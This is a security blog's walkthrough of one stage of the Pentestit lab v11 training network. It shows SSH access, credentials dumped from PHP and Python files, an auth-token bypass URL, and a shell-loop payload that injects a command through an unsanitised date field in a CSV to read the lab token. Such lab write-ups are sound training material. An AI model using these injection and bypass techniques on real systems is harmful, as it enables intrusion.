Innogen security

RECENT BLOG

Posted in Blog post

Pentestit lab v11 Guide Part 8

 

Site 1 Access Control

Having navigated the systems and networks we take a look at the access control system and using our newly obtained aengineer ssh user we are able to login successfully:

 

root@kali:~/pentestit$ ssh -o StrictHostKeyChecking=no aengineer@172.16.0.16 -i adminnet.key
Last login: Tue Jul  4 23:07:52 2017 from 192.168.11.1
##########################
PasswordAuthentication no
##########################
aengineer@tl11-172-16-0-16:~$

BASH History:

From the bash history we note the web directory and a few useful files to check out:

 

aengineer@tl11-172-16-0-16:~$ cat .bash_history 
ls
ssh-keygen 
cd .ssh/
ls
rm id_rsa*
vi authorized_keys
cd .ssh
ls
ls -l
cd .ssh
ls
vi authorized_keys 
id
who
exit
ls -l
ls -la
cd .ssh
ls
cat authorized_keys 
vi authorized_keys 
cat authorized_keys 
w
who
finger
who
cd /var/www/html/
cat login.php 
cd /var/www/html/
cat token.sec 
cd /var/www/
ls
cd html
pwd
ls
ls -l
cat token.sec
cat login.php
cat ftpclient.py 
cat parse.php 
iptables -l

LOGIN.php file:

We cat the login.php in the /var/www/html dir and obtain the portal login credentials:

 

<?php

$usr="admin@11.lab";
$pwd="admin";

$username=$_POST['email'];
$password=$_POST['password'];

if (($username==$usr) && ($password==$pwd)) {
 header('Location: parse.php?auth=asdfgtgrfedQWERsdfd');
 }else{
 header('Location: index.html');
}

?>

 

FTPClient.py file:

We then check the contents of the ftp client file that was shown in the bash history:

 

#!//usr/bin/python

from ftplib import FTP
import sys
ftp = FTP()
ftp.connect('172.16.0.17','21',3)
ftp.login('acontrol','IControlEverything')
with open('/var/www/html/db.csv', 'w+b') as f:
    res = ftp.retrbinary('RETR db.csv', f.write)
    if not res.startswith('226 Transfer complete'):
        print('Downloaded of file {0} is not compile.'.format(orig_filename))
        os.remove(local_filename)
ftp.quit()

what is interesting here is it connects to the opposite side of the access control system and writes out the db.csv

PARSE.php file:

The parse file has an auth comparison hard coded which means for the given url we do not need to login we can pass this auth value in as a parameter:

http://172.16.0.16/parse.php?auth=asdfgtgrfedQWERsdfd

Reviewing the code we find an exec command for the date field in the screenshot which is not sanitised and potentially allows command injection:

 $converted = exec('date -d @'.$value);

Unfortunately the db.csv local file is writable by root only so we test the connection to .17 the partner to .16 access control system.

172.16.0.17

Once connected to .17 we open the history file again and notice the db.csv in a different path:

cd /var/ftp
less /var/ftp/db.csv

We also find that the db.csv on this host is writable by aengineer:

Based on the knowledge we have around the db.csv, the auth.php with creds and exec command we can test the command execution via the date field of the db.csv file.

NOTE: I spent a good deal of time on this to get a working response and for some reason echo commands failed me and once again a python -c “print” command produced the results required.
Also not shown here is the fact that the results were missed during testing as the db.csv file data is frequently repopulated with a remote copy thus overwriting the command injection so a while loop was needed to ensure the results are witnessed.

Route to Access Control token:

  • Open: http://172.16.0.16/parse.php?auth=asdfgtgrfedQWERsdfd in a browser
  • In the ssh session on the .17 access control server execute the following:
    while true; do python -c ‘print “Name;Surname;In;Out;ID\nl33t;fraggle;1497676800.0|cat /var/www/html/token.sec > /tmp/tt.txt;1497712800.0;39514″‘ > db.csv; sleep 3;done
  • Refresh the browser until we see our result.
  • On the .16 server we cat /tmp/tt.txt to view the token

 

Conclusion:

This was a fantastic lab and reminded me of a few hosts within the OSCP labs as mentioned during this writeup and the fact that pentestit offer this for free is amazing and truly offers pentesters/ctf hobbyists fun and challenges based on real world scenarios; I will be eagerly waiting the next set of labs….

I have to thank Roman Romanov for creating this amazing site and for Luka Safanov for quickly responding quickly to the rare requirement of resetting a host or 2 via telegram after access issues (normally down to a user changing the password…)

Innogen security

RECENT BLOG

Exploiting Sudo 1.8.27 The following brief is a quick demonstration of the issue faced by cve-2019-14287. This issue is presented when the user is allowed to run a specified command as any user other than the root user account, specified …

17 Oct 2019

SMB LFI Exploitation The following outlines a very short overview of LFI using SMB in form of a crib sheet. Install Samba: apt-get install samba Remove default Samba config: rm -f /etc/samba/smb.conf Create New smb.conf: vi /etc/samba/smb.conf The following config …

13 Oct 2019

Linux reverse shell without python. During a recent application exploit into an interactive shell the typical path to spawn a reverse shell and upgrade it to tty was sought. It was found that the go to technologies such as python, …

19 Sep 2019